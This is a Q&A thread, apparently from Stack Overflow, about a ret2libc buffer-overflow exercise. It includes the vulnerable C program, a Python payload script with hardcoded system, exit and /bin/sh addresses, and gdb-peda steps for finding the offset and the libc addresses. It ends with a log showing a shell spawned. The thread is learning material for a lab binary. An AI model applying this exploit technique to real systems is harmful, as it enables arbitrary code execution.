# ret2libc exploit exercise leads to /bin/bash: warning: command substitution: ignored null byte in input

Tags: c, linux, gdb, exploit

i have this c code i am working to create exploit for:

```
#include <stdio.h>
void secretFunction()
{
  printf("Congratulations!\n");
  printf("You have entered in the secret function!\n");
}
void echo()
{
            char buffer[20];
            printf("Enter some text:\n");
            scanf("%s", buffer);
            printf("You entered: %s\n", buffer);
}    
int main()
{
            echo();
            return 0;
}
```

i wrote exploit in python:

```
system_addr = struct.pack("<I", 0xb7e1d200)
shell_addr  = struct.pack("<I", 0xbffffef3)
exit_addr   = struct.pack("<I", 0xb7e103d0)
buf  =   "B" * 32
buf  +=  system_addr
buf  +=  exit_addr
buf  +=  shell_addr
print buf
```

when i exicute in gdb it gave me:

```
/bin/bash: warning: command substitution: ignored null byte in input
```

and no redirection to shell  so what is the problem ?

Comment: Do you know what a null byte is and why it might be a problem?

Comment: i think its forbidden bytes in executable file

Comment: Do you know how strings work in C?

Comment: i am not c programmer i am just python coder , and working for exploit exercises , what should i read to fix this problem

Comment: You should learn how C and assembly work. Otherwise how will you be able to learn to write exploits?

Comment: can you try the exercise , and find what is the problem ?

Comment: Can you edit your question to show the commands you used in gdb to run the c program and the python program?

Comment: gdb ./01_stack_overflow_scanf_example

Comment: gdb-peda$ pattern create 100

Comment: gdb-peda$ r <<< 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJA

Comment: `gdb-peda$ pattern offset 0x41412941`
`1094789441 found at offset: 32`

Comment: gdb-peda$ p system
$1 = {int (const char *)} 0xb7e1d200 <__libc_system>

Comment: gdb-peda$ p exit
$2 = {void (int)} 0xb7e103d0 <__GI_exit>

Comment: gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7f5e0cf ("/bin/sh")

Comment: gdb-peda$ r <<< $(python exploit.py)

Comment: OK, a limitation of most shells, including bash, is that they'll remove NUL characters from command substitution `$(...)` output. You have a NUL byte in `0xb7e1d200`. Can you  use another address, or have that python script write to a file?

Comment: i will try it now

Comment: gdb-peda$ r < exp.md
Starting program: /home/mal/buffer_overflow_lab/01_stack_overflow_scanf_example < exp.md
Enter some text:
You entered: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
[New process 26043]
process 26043 is executing new program: /bin/dash
[New process 26285]
process 26285 is executing new program: /bin/dash
[Inferior 3 (process 26285) exited normally]
Warning: not running or target is remote

Comment: Looks like you've succeeded in making it spawn a shell, which exited immedately because it had nothing to do. If you wish, you can answer this question showing the steps you took.  There's a related question [ret2libc attack doesn't spawn shell](https://stackoverflow.com/a/62836642/2554472) which has an answer that shows how to make the shell run some commands.